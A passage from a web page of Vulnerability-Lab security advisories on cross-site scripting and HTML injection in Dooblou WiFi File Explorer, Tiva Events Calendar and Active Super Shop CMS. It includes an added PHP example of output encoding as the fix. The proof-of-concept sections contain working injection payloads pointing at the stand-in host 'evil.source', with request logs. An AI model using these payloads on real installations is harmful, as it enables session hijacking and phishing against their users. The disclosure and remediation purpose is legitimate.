Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ;https://www.vulnerability-db.com<br /><br />Any modified copy or reproduction, including partial usages, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material contact (admin@ or research@) to ask permission.<br /><br /> Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
<pre><code>Document Title:<br />===============<br />Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2317<br /><br /><br />Release Date:<br />=============<br />2023-07-04<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2317<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.1<br /><br /><br />Vulnerability Class:<br />====================<br />Multiple<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />Browse, download and stream individual files that are on your Android device, using a web browser via a WiFi connection.<br />No more taking your phone apart to get the SD card out or grabbing your cable to access your camera pictures and copy across your favourite MP3s.<br /><br />(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.dooblou.WiFiFileExplorer )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered multiple web vulnerabilities in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application.<br /><br />Affected Product(s):<br />====================<br />Product Owner: dooblou<br />Product: Dooblou WiFi File Explorer v1.13.3 - (Android) (Framework) (Wifi) (Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-01-19: Researcher Notification & Coordination (Security Researcher)<br />2022-01-20: Vendor Notification (Security Department)<br />2022-**-**: Vendor Response/Feedback (Security Department)<br />2022-**-**: Vendor Fix/Patch (Service Developer Team)<br />2022-**-**: Security 
Acknowledgements (Security Department)<br />2023-07-04: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Restricted Authentication (Guest Privileges)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Independent Security Research<br /><br /><br />Technical Details & Description:<br />================================<br />Multiple input validation web vulnerabilities have been discovered in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application.<br />The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser to web-application<br />requests from the application-side.<br /><br />The vulnerabilities are located in the `search`, `order`, `download`, `mode` parameters. The requested content via get method request is insecurely validated<br />and executes malicious script codes. The attack vector is non-persistent and the request method to inject is get. Attackers do not need to be authorized to<br />perform an attack to execute malicious script codes. 
The links can be included as a malformed upload, for example, to provoke an execution by a view of the<br />front- & backend of the wifi explorer.<br /><br />Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious<br />source and non-persistent manipulation of affected application modules.<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The input validation web vulnerabilities can be exploited by remote attackers without a user account and with low user interaction.<br />For security demonstration or to reproduce the web vulnerabilities follow the provided information and steps below to continue.<br /><br /><br />PoC: Exploitation<br />http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK PATH TO RETURN INDEX</a><br />http://localhost:8000/storage/emulated/0/Download/?mode=31&search=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert%28document.domain%29%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX%3C%2Fa%3E&x=3&y=3<br />http://localhost:8000/storage/emulated/0/Download/?mode=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3<br />http://localhost:8000/storage/emulated/?order=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX<br /><br /><br />Vulnerable Sources: Execution Points<br /><table width="100%" cellspacing="0" cellpadding="16" border="0"><tbody><tr><td<br />style="vertical-align:top;"><table style="background-color: #FFA81E;<br />background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png);<br />background-repeat: repeat-x; background-position:top;" width="700"<br />cellspacing="3" cellpadding="5" border="0"><tbody><tr><td><center><span<br 
/>class="doob_large_text">ERROR</span></center></td></tr></tbody></table><br><tabl<br />e style="background-color: #B2B2B2; background-image:<br />url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" width="700" cellspacing="3" cellpadding="5" border="0"><br /><tbody><tr><td><span class="doob_medium_text">Cannot find file or<br />directory! /storage/emulated/0/Download/<a href="https://evil.source" onmouseover="alert(document.domain)"><br>PLEASE CLICK USER PATH TO RETURN<br />INDEX</a></span></td></tr></tbody></table><br><span class="doob_medium_text"><span class="doob_link">&nbsp;&nbsp;<a<br />href="/">>>&nbsp;Back To<br />Files&nbsp;>></a></span></span><br></td></tr></tbody></table><br><br />-<br /><li></li></ul></span></span></td></tr></tbody></table></div><div class="body row scroll-x scroll-y"><table width="100%" cellspacing="0" cellpadding="6" border="0"><tbody><tr><br /><td style="vertical-align:top;" width="100%"><form name="multiSelect" style="margin: 0px; padding: 0px;" action="/storage/emulated/0/Download/" enctype="multipart/form-data" method="POST"><br /><input type="hidden" name="fileNames" value=""><table width="100%" cellspacing="0" cellpadding="1" border="0" bgcolor="#000000"><tbody><tr><td><br /><table width="100%" cellspacing="2" cellpadding="3" border="0" bgcolor="#FFFFFF"><tbody><tr style="background-color: #FFA81E; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png);<br />background-repeat: repeat-x; background-position:top;" height="30"><td colspan="5"><table width="100%" cellspacing="0" cellpadding="0" border="0"><tbody><tr><td style="white-space:<br />nowrap;vertical-align:middle"><span class="doob_small_text_bold">&nbsp;</span></td><td style="white-space: nowrap;vertical-align:middle" align="right"><span class="doob_small_text_bold"><br />&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=23&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH 
TO RETURN INDEX&search=a"><br /><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img" title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<br /><a href="?view=24&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a"><br /><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<br /><a href="?view=38&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN I<br />-<br /><td style="white-space: nowrap;vertical-align:middle"><input value="" type="checkbox" name="selectAll" onclick="setCheckAll();">&nbsp;&nbsp;<a class="doob_button"<br />href="javascript:setMultiSelect('/storage/emulated/', 'action', '18&order=>" <<="">>"<a href="https://evil.source" onmouseover=alert(document.domain)">');javascript:document.multiSelect.submit();"<br />style="">Download</a>&nbsp;<a class="doob_button" href="javascript:setMultiSelectConfirm('Are you sure you want to delete? 
This cannot be undone!', '/storage/emulated/', 'action',<br />'13&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>');javascript:document.multiSelect.submit();" style="">Delete</a>&nbsp;<br /><a class="doob_button" href='javascript:setMultiSelectPromptQuery("Create Copy",<br />"/storage/emulated/", "/storage/emulated/", "action", "35&order=>"<<<a href="https://evil.source" onmouseover=alert(document.domain)>", "name");javascript:document.multiSelect.submit();'<br />style="">Create Copy</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Zip</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Unzip</a></td><br /><td align="right" style="white-space: nowrap;vertical-align:middle"><span class="doob_small_text_bold">&nbsp;&nbsp;&nbsp;&nbsp;<a href="javascript:showTreeview()"><img style="vertical-align:middle;border-style: <br />none" src="/x99_dooblou_res/x99_dooblou_tree_dark.png" alt="img" title="Show Treeview"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<br /><a href="?view=23&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img"<br />title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=24&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style:<br />none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<br /><a href="?view=38&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_grid.png" alt="img"<br />title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;</span></td></tr></table><br /><br /><br />---PoC Session Logs ---<br 
/>http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xml<br />Host: localhost:8000<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: */*<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Connection: keep-alive<br />Referer:http://localhost:8000/storage/emulated/0/Download/%3Ca%20href=%22https://evil.source%22%20onmouseover=alert(document.domain)%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3E<br />GET: HTTP/1.1 200 OK<br />Cache-Control: no-cache<br />Content-Type: text/xml<br />-<br />http://localhost:8000/storage/emulated/0/Download/?mode=<a+href%3D"https%3A%2F%2Fevil.source"+onmouseover%3Dalert(document.domain)><br>PLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3<br />Host: localhost:8000<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Connection: keep-alive<br />Cookie: treeview=0<br />Upgrade-Insecure-Requests: 1<br />GET: HTTP/1.1 200 OK<br />Cache-Control: no-store, no-cache, must-revalidate<br />Content-Type: text/html<br />-<br />http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xml<br />Host: localhost:8000<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0<br />Accept: */*<br />Accept-Language: de,en-US;q=0.7,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Connection: keep-alive<br />Referer:http://localhost:8000/storage/emulated/0/Download/%<a href="https://evil.source" 
onmouseover=alert(document.domain)>%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3E<br />GET: HTTP/1.1 200 OK<br />Cache-Control: no-cache<br />Content-Type: text/xml<br /><br /><br />Security Risk:<br />==============<br />The security risk of the multiple web vulnerabilities in the ios mobile wifi web-application is estimated as medium.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ;https://www.vulnerability-db.com<br /><br />Any modified copy or reproduction, including partial usages, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. 
All pictures, texts, advisories, source code, videos and other<br />information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material contact (admin@ or research@) to ask permission.<br /><br /> Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
<pre><code>Document Title:<br />===============<br />Tiva Events Calender v1.4 - Cross Site Scripting Vulnerability<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2276<br /><br /><br />Release Date:<br />=============<br />2023-07-05<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2276<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5<br /><br /><br />Vulnerability Class:<br />====================<br />Cross Site Scripting - Persistent<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />Events Calendar For PHP is a powerful PHP calendar script that can be easily integrated and used with various PHP projects,<br />such as scheduler, event handler, etc. The calendar is simple to install, deploy, and use. 
It is suitable for all types of<br />service businesses to get online reservations without any hassles.<br /><br />(Copy of the Homepage:https://codecanyon.net/item/tiva-events-calendar-for-php/19199337 )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered a persistent script code injection vulnerability in the Tiva Events Calender v1.4 web-application.<br /><br /><br />Affected Product(s):<br />====================<br />tiva_theme<br />Product: Tiva Events Calender - Calender PHP (Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2021-04-03: Researcher Notification & Coordination (Security Researcher)<br />2021-04-04: Vendor Notification 1 (Security Department)<br />2021-06-24: Vendor Notification 2 (Security Department)<br />2021-07-13: Vendor Notification 3 (Security Department)<br />****-**-**: Vendor Response/Feedback (Security Department)<br />****-**-**: Vendor Fix/Patch (Service Developer Team)<br />****-**-**: Security Acknowledgements (Security Department)<br />2023-07-05: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Restricted Authentication (User Privileges)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Responsible Disclosure<br /><br /><br />Technical Details & Description:<br />================================<br />A persistent input validation web vulnerability has been discovered in the official Tiva Events Calender v1.4 web-application.<br />The vulnerability allows remote attackers to inject own malicious script 
codes with persistent attack vector to compromise browser<br />to web-application requests from the application-side.<br /><br />The vulnerability is located in the name input field and name parameter. Remote attackers with privileged user accounts are able to inject<br />own malicious script codes as name. This results in a persistent execution of the script code in the backend on edit, as well as in the<br />frontend (index) where the event is displayed after the submit (save) via post method request. In the same direction it is possible<br />to inject malformed client-side executable script code in a get request to trigger a non-persistent execution.<br /><br />Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects<br />to malicious source and persistent manipulation of affected frontend / backend application modules.<br /><br />Request Method(s):<br />[+] POST / GET<br /><br />Vulnerable Input(s):<br />[+] Name<br /><br />Vulnerable Parameter(s):<br />[+] name<br /><br />Affected Module(s):<br />[+] index.php (Frontend on Event Preview)<br />[+] edit.php (Backend on Edit ID)<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The persistent input validation web vulnerability can be exploited by remote attackers with a low privileged user account and with low user interaction.<br />For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.<br /><br /><br />Exploitation: Payload<br />%20"<img src="evil.source" onload=alert(document.domain)><br /><br /><br />Vulnerable Source: Frontend (Index)<br /><tr><td class="calendar-day-normal"><span class="calendar-day-weekend">8</span></td><br /><td class="calendar-day-normal"><div class="calendar-day-file">9<div class="calendar-file-name color-4" onclick="downloadFile(220)"><br /><span class="event-name">event1"%20"<img src="evil.source" 
onload=alert(document.domain)></span></div></div></td><td class="calendar-day-normal">10</td><br /><td class="calendar-day-normal">11</td><td class="calendar-day-normal">12</td><td class="calendar-day-normal">13</td><br /><td class="calendar-day-normal"><span class="calendar-day-weekend">14</span></td></tr><br /><br /><br />Vulnerable Source: Backend (Edit ID)<br /><section class="panel"><br /><header class="panel-heading"><i class="fa fa-folder-open"></i> Edit File</header><br /><div class="panel-body"><br /><div class="alert alert-success"><br /><button data-dismiss="alert" class="close close-sm" type="button"><br /><i class="fa fa-times"></i><br /></button>Report successfully saved.</div> <br /><form class="form-horizontal" action="edit.php?id=220" method="post" enctype="multipart/form-data"><br /><div class="form-group"><br /><label class="col-lg-2 col-sm-2 control-label">Name<span class="star">&nbsp;*</span></label><br /><div class="col-sm-8"><br /><input type="text" name="name" class="form-control" value="event1"%20"<img src="evil.source" onload=alert(document.domain)>" required /><br /></div></div><br /><br /><br />--- PoC Session Logs (POST) ---<br />https://tiva-cal.localhost:8080/admin/report/edit.php<br />Host: tiva-cal.localhost:8080<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Content-Type: multipart/form-data; boundary=---------------------------249785717017581481612148649683<br />Content-Length: 745<br />Origin:https://tiva-cal.localhost:8080<br />Connection: keep-alive<br />Referer:https://tiva-cal.localhost:8080/admin/report/edit.php<br />Cookie: PHPSESSID=76gqk14e1s6cce40hfj11<br />name="%20%20"<img src="evil.source" onload=alert(document.domain)>&type=1&time=20-08-2021&file=temp.txt&save=<br />-<br />POST: HTTP/2.0 200 OK<br />server: nginx<br />content-type: text/html<br />content-length: 1283<br />etag: "503-53ed12f4ca761"<br />accept-ranges: bytes<br />strict-transport-security: max-age=15768000; 
includeSubDomains<br />-<br />https://tiva-cal.localhost:8080/admin/report/evil.source<br />Host: tiva-cal.localhost:8080<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: image/webp,*/*<br />Connection: keep-alive<br />Referer:https://tiva-cal.localhost:8080/admin/report/edit.php?id=222<br />Cookie: PHPSESSID=76gqk14e1s6cce40hfj11<br />-<br />GET: HTTP/2.0 200 OK<br />server: nginx<br />content-type: text/html<br />content-length: 1283<br />etag: "503-53ed12f4ca761"<br />accept-ranges: bytes<br />strict-transport-security: max-age=15768000; includeSubDomains<br /><br /><br />Solution - Fix & Patch:<br />=======================<br />The vulnerability can be patched by the following steps ...<br />1. Encode and escape the name input field content on transmit via post method<br />2. Restrict the input field and disallow insertion of special chars<br />3. Encode the output location on the index frontend to sanitize it and prevent the execution<br />4. Encode the output location on the edit id report backend to sanitize it and prevent the execution<br /><br /><br />Security Risk:<br />==============<br />The security risk of the persistent input validation vulnerability in the web-application is estimated as medium.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. 
Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com<br /><br />Any modified copy or reproduction, including partial usages, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material contact (admin@ or research@) to ask permission.<br /><br /> Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
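Steps 1 to 4 of the Tiva "Solution - Fix & Patch" section above, and the reflected `search`, `order` and `mode` parameters in the Dooblou WiFi File Explorer advisory before it, come down to the same practice: encode every user-controlled value for the exact output context it lands in, and allow-list stored fields such as the event name on input. The PHP below is an added example written for this page; it is not code from Tiva, Dooblou or Vulnerability-Lab. The function names (`html_escape`, `weak_escape`, `js_in_attr_escape`, `valid_event_name`, the `render_*` helpers), the `setOrder()` handler and the sample inputs are assumptions made for illustration, modelled on the payload shapes quoted in the advisories.

```php
<?php
// Added example for this page (not code from Tiva, Dooblou or Vulnerability-Lab).
// It shows the fix the advisories ask for: encode user-controlled values for the
// exact output context, and allow-list the stored "name" field on input.
// All function names and the setOrder() handler are illustrative assumptions.
declare(strict_types=1);

// Encoding that is correct for an HTML text node AND a double-quoted attribute value.
// ENT_QUOTES is the important flag: the advisory payload starts with a quote to close
// value="...", so encoding only < and > would leave the attribute context breakable.
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// The insufficient variant (angle brackets only), kept here for comparison.
function weak_escape(string $value): string
{
    return str_replace(['<', '>'], ['&lt;', '&gt;'], $value);
}

// Value placed inside a JavaScript string literal that itself sits inside an inline
// event-handler attribute, the onclick="setMultiSelect('...')" pattern in the file
// explorer source. Two layers are needed: JS string encoding, then attribute encoding.
function js_in_attr_escape(string $value): string
{
    $js = json_encode($value, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_UNESCAPED_UNICODE);
    if ($js === false) {                       // e.g. invalid UTF-8 in the input
        throw new InvalidArgumentException('value is not valid UTF-8');
    }
    return html_escape($js);                   // $js is a double-quoted JS literal
}

// Allow-list for the event name (step 2 of the Tiva fix): letters, digits, space and
// a few punctuation characters, at most 100 bytes. Angle brackets and quotes are rejected.
function valid_event_name(string $name): bool
{
    return strlen($name) <= 100
        && preg_match('/\A[\p{L}\p{N} .,_-]+\z/u', $name) === 1;
}

// True when an "escaped" value could still close a quoted attribute or open a tag.
function still_breaks_context(string $escaped): bool
{
    return strpbrk($escaped, '"<>') !== false;
}

// The two output locations named in the Tiva advisory, with encoding applied.
function render_event_span(string $name): string
{
    return '<span class="event-name">' . html_escape($name) . '</span>';
}

function render_edit_input(string $name): string
{
    return '<input type="text" name="name" class="form-control" value="'
        . html_escape($name) . '" required />';
}

// A link whose inline handler receives the user-controlled "order" value as a JS string.
function render_order_link(string $order): string
{
    return '<a href="#" onclick="setOrder(' . js_in_attr_escape($order) . ')">Download</a>';
}

// Constructed sample inputs modelled on the payload shapes quoted in the advisories.
$storedName = 'event1"%20"<img src="evil.source" onload=alert(document.domain)>';
$orderParam = '18&order=>"<a href="https://evil.source" onmouseover=alert(document.domain)>';

echo render_event_span($storedName), PHP_EOL;
echo render_edit_input($storedName), PHP_EOL;
echo render_order_link($orderParam), PHP_EOL;
printf("weak escape still breaks attribute context: %s\n",
    still_breaks_context(weak_escape($storedName)) ? 'yes' : 'no');
printf("html_escape still breaks attribute context: %s\n",
    still_breaks_context(html_escape($storedName)) ? 'yes' : 'no');
printf("payload passes name allow-list: %s\n",
    valid_event_name($storedName) ? 'yes' : 'no');
printf("'Team meeting 2021-08-20' passes name allow-list: %s\n",
    valid_event_name('Team meeting 2021-08-20') ? 'yes' : 'no');
```

Run it with `php` on the command line and compare the printed markup with the "Vulnerable Source" listings above: in the encoded versions the stored value can no longer close the `value="..."` attribute or open an `<img>` tag, and the same value fails the allow-list before it is ever stored. The JS-in-attribute case is included because the file explorer source builds `onclick` handlers from the `order` parameter, a context where HTML encoding on its own is not sufficient; `json_encode` with the `JSON_HEX_*` flags produces a JS string literal that is then attribute-encoded, so the browser decodes each layer in the right order.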
<pre><code>Document Title:<br />===============<br />Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2278<br /><br /><br />Release Date:<br />=============<br />2023-07-04<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2278<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.4<br /><br /><br />Vulnerability Class:<br />====================<br />Script Code Injection<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />https://codecanyon.net/item/active-super-shop-multivendor-cms/12124432<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered multiple html injection vulnerabilities in the Active Super Shop Multi-vendor CMS v2.5 web-application.<br /><br /><br />Affected Product(s):<br />====================<br />ActiveITzone<br />Product: Active Super Shop CMS v2.5 (CMS) (Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2021-08-20: Researcher Notification & Coordination (Security Researcher)<br />2021-08-21: Vendor Notification (Security Department)<br />2021-**-**: Vendor Response/Feedback (Security Department)<br />2021-**-**: Vendor Fix/Patch (Service Developer Team)<br />2021-**-**: Security Acknowledgements (Security Department)<br />2023-07-05: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication 
Type:<br />====================<br />Restricted Authentication (User Privileges)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Responsible Disclosure<br /><br /><br />Technical Details & Description:<br />================================<br />Multiple html injection web vulnerabilities have been discovered in the official Active Super Shop Multi-vendor CMS v2.5 web-application.<br />The web vulnerability allows remote attackers to inject own html codes with persistent vector to manipulate application content.<br /><br />The persistent html injection web vulnerabilities are located in the name, phone and address parameters of the manage profile and products branding module.<br />Remote attackers with privileged accountant access are able to inject own malicious script code in the name parameter to provoke a persistent execution on<br />profile view or products preview listing. There are 3 different privilege levels that are allowed to access the backend: the accountant (low privileges), the<br />manager (medium privileges) and the admin (high privileges). Accountants are able to attack the higher privileged access roles of admins and managers on preview<br />of the elements in the backend to compromise the application. 
The request method to inject is post and the attack vector is persistent located on the application-side.<br /><br />Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and<br />persistent manipulation of affected application modules.<br /><br />Request Method(s):<br />[+] POST<br /><br />Vulnerable Module(s):<br />[+] Manage Details<br /><br />Vulnerable Parameter(s):<br />[+] name<br />[+] phone<br />[+] address<br /><br />Affected Module(s):<br />[+] manage profile<br />[+] products branding<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The html injection web vulnerabilities can be exploited by remote attackers with privileged accountant access and with low user interaction.<br />For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.<br /><br /><br />Exploitation: Payload<br /><img src="https://[DOMAIN]/[PATH]/[PICTURE].*"><br /><br /><br />Vulnerable Source: manage_admin & branding<br /><div class="tab-pane fade active in" id="" style="border:1px solid #ebebeb; border-radius:4px;"><br /><div class="panel-heading"><br /><h3 class="panel-title">Manage Details</h3><br /></div><br /><form action="https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/" class="form-horizontal" method="post" accept-charset="utf-8"><br /><div class="panel-body"><br /><div class="form-group"><br /><label class="col-sm-3 control-label" for="demo-hor-1">Name</label><br /><div class="col-sm-6"><br /><input type="text" name="name" value="Mr. 
